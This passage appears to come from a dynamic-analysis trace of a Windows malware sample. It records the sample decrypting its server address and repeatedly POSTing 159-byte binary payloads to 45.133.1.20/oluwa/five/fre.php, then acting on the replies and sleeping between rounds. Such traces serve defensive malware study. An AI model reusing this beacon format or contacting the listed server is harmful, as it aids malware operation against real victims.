dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0268.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.056] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.057] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.057] GetProcessHeap () returned 0x6a0000 [0268.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0268.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.059] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0268.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.060] CryptDestroyKey (hKey=0x6ad020) returned 1 [0268.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.061] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0268.061] GetProcessHeap () returned 0x6a0000 [0268.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.062] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0268.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.064] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0268.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.065] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0268.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.065] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0268.067] GetProcessHeap () returned 0x6a0000 [0268.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.067] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0268.068] GetProcessHeap () returned 0x6a0000 [0268.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0268.068] socket (af=2, type=1, protocol=6) returned 0x958 [0268.068] connect (s=0x958, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0268.093] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0268.093] GetProcessHeap () returned 0x6a0000 [0268.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0268.093] GetProcessHeap () returned 0x6a0000 [0268.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0268.094] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.095] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.095] GetProcessHeap () returned 0x6a0000 [0268.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0268.095] GetProcessHeap () returned 0x6a0000 [0268.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.096] GetProcessHeap () returned 0x6a0000 [0268.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0268.096] GetProcessHeap () returned 0x6a0000 [0268.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0268.096] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.097] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.097] GetProcessHeap () returned 0x6a0000 [0268.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0268.097] GetProcessHeap () returned 0x6a0000 [0268.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.098] send (s=0x958, buf=0x6bd460*, len=242, flags=0) returned 242 [0268.098] send (s=0x958, buf=0x6bb998*, len=159, flags=0) returned 159 [0268.098] GetProcessHeap () returned 0x6a0000 [0268.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0268.098] recv (in: s=0x958, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0268.176] GetProcessHeap () returned 0x6a0000 [0268.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0268.176] GetProcessHeap () returned 0x6a0000 [0268.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0268.177] GetProcessHeap () returned 0x6a0000 [0268.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0268.177] GetProcessHeap () returned 0x6a0000 [0268.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0268.177] closesocket (s=0x958) returned 0 [0268.178] GetProcessHeap () returned 0x6a0000 [0268.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0268.178] GetProcessHeap () returned 0x6a0000 [0268.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.179] GetProcessHeap () returned 0x6a0000 [0268.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0268.179] GetProcessHeap () returned 0x6a0000 [0268.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d8) returned 0x958 [0268.181] Sleep (dwMilliseconds=0xea60) [0268.182] GetProcessHeap () returned 0x6a0000 [0268.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0268.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.191] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0268.199] GetProcessHeap () returned 0x6a0000 [0268.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0268.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.201] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0268.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.201] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.215] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.215] GetProcessHeap () returned 0x6a0000 [0268.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0268.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.217] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0268.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.219] CryptDestroyKey (hKey=0x6ad060) returned 1 [0268.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.220] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0268.220] GetProcessHeap () returned 0x6a0000 [0268.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.221] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.223] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.224] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.225] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.225] GetProcessHeap () returned 0x6a0000 [0268.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0268.225] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.225] GetProcessHeap () returned 0x6a0000 [0268.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0268.226] GetProcessHeap () returned 0x6a0000 [0268.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.227] GetProcessHeap () returned 0x6a0000 [0268.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0268.228] GetProcessHeap () returned 0x6a0000 [0268.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0268.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.229] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0268.246] GetProcessHeap () returned 0x6a0000 [0268.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0268.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.247] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.248] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.250] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.250] GetProcessHeap () returned 0x6a0000 [0268.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0268.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.255] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0268.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.257] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.258] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0268.258] GetProcessHeap () returned 0x6a0000 [0268.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0268.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0268.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0268.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.263] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0268.263] GetProcessHeap () returned 0x6a0000 [0268.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.263] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0268.263] GetProcessHeap () returned 0x6a0000 [0268.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0268.263] socket (af=2, type=1, protocol=6) returned 0x95c [0268.264] connect (s=0x95c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0268.292] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0268.292] GetProcessHeap () returned 0x6a0000 [0268.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0268.292] GetProcessHeap () returned 0x6a0000 [0268.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0268.293] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.294] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.294] GetProcessHeap () returned 0x6a0000 [0268.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0268.295] GetProcessHeap () returned 0x6a0000 [0268.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.296] GetProcessHeap () returned 0x6a0000 [0268.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0268.297] GetProcessHeap () returned 0x6a0000 [0268.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0268.297] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.299] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.299] GetProcessHeap () returned 0x6a0000 [0268.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0268.299] GetProcessHeap () returned 0x6a0000 [0268.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.300] send (s=0x95c, buf=0x6bd460*, len=242, flags=0) returned 242 [0268.301] send (s=0x95c, buf=0x6bb998*, len=159, flags=0) returned 159 [0268.301] GetProcessHeap () returned 0x6a0000 [0268.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0268.301] recv (in: s=0x95c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0268.388] GetProcessHeap () returned 0x6a0000 [0268.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0268.388] GetProcessHeap () returned 0x6a0000 [0268.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0268.389] GetProcessHeap () returned 0x6a0000 [0268.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0268.389] GetProcessHeap () returned 0x6a0000 [0268.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0268.389] closesocket (s=0x95c) returned 0 [0268.390] GetProcessHeap () returned 0x6a0000 [0268.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0268.390] GetProcessHeap () returned 0x6a0000 [0268.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.391] GetProcessHeap () returned 0x6a0000 [0268.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0268.391] GetProcessHeap () returned 0x6a0000 [0268.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16dc) returned 0x95c [0268.393] Sleep (dwMilliseconds=0xea60) [0268.396] GetProcessHeap () returned 0x6a0000 [0268.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0268.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.397] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0268.412] GetProcessHeap () returned 0x6a0000 [0268.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0268.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.414] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.415] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.420] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.420] GetProcessHeap () returned 0x6a0000 [0268.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0268.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.423] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0268.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.424] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.425] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0268.425] GetProcessHeap () returned 0x6a0000 [0268.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.427] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.428] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.437] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.437] GetProcessHeap () returned 0x6a0000 [0268.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.437] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.437] GetProcessHeap () returned 0x6a0000 [0268.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.438] GetProcessHeap () returned 0x6a0000 [0268.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.439] GetProcessHeap () returned 0x6a0000 [0268.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0268.440] GetProcessHeap () returned 0x6a0000 [0268.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0268.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0268.459] GetProcessHeap () returned 0x6a0000 [0268.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0268.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.461] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.461] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.465] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.465] GetProcessHeap () returned 0x6a0000 [0268.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0268.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.466] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: 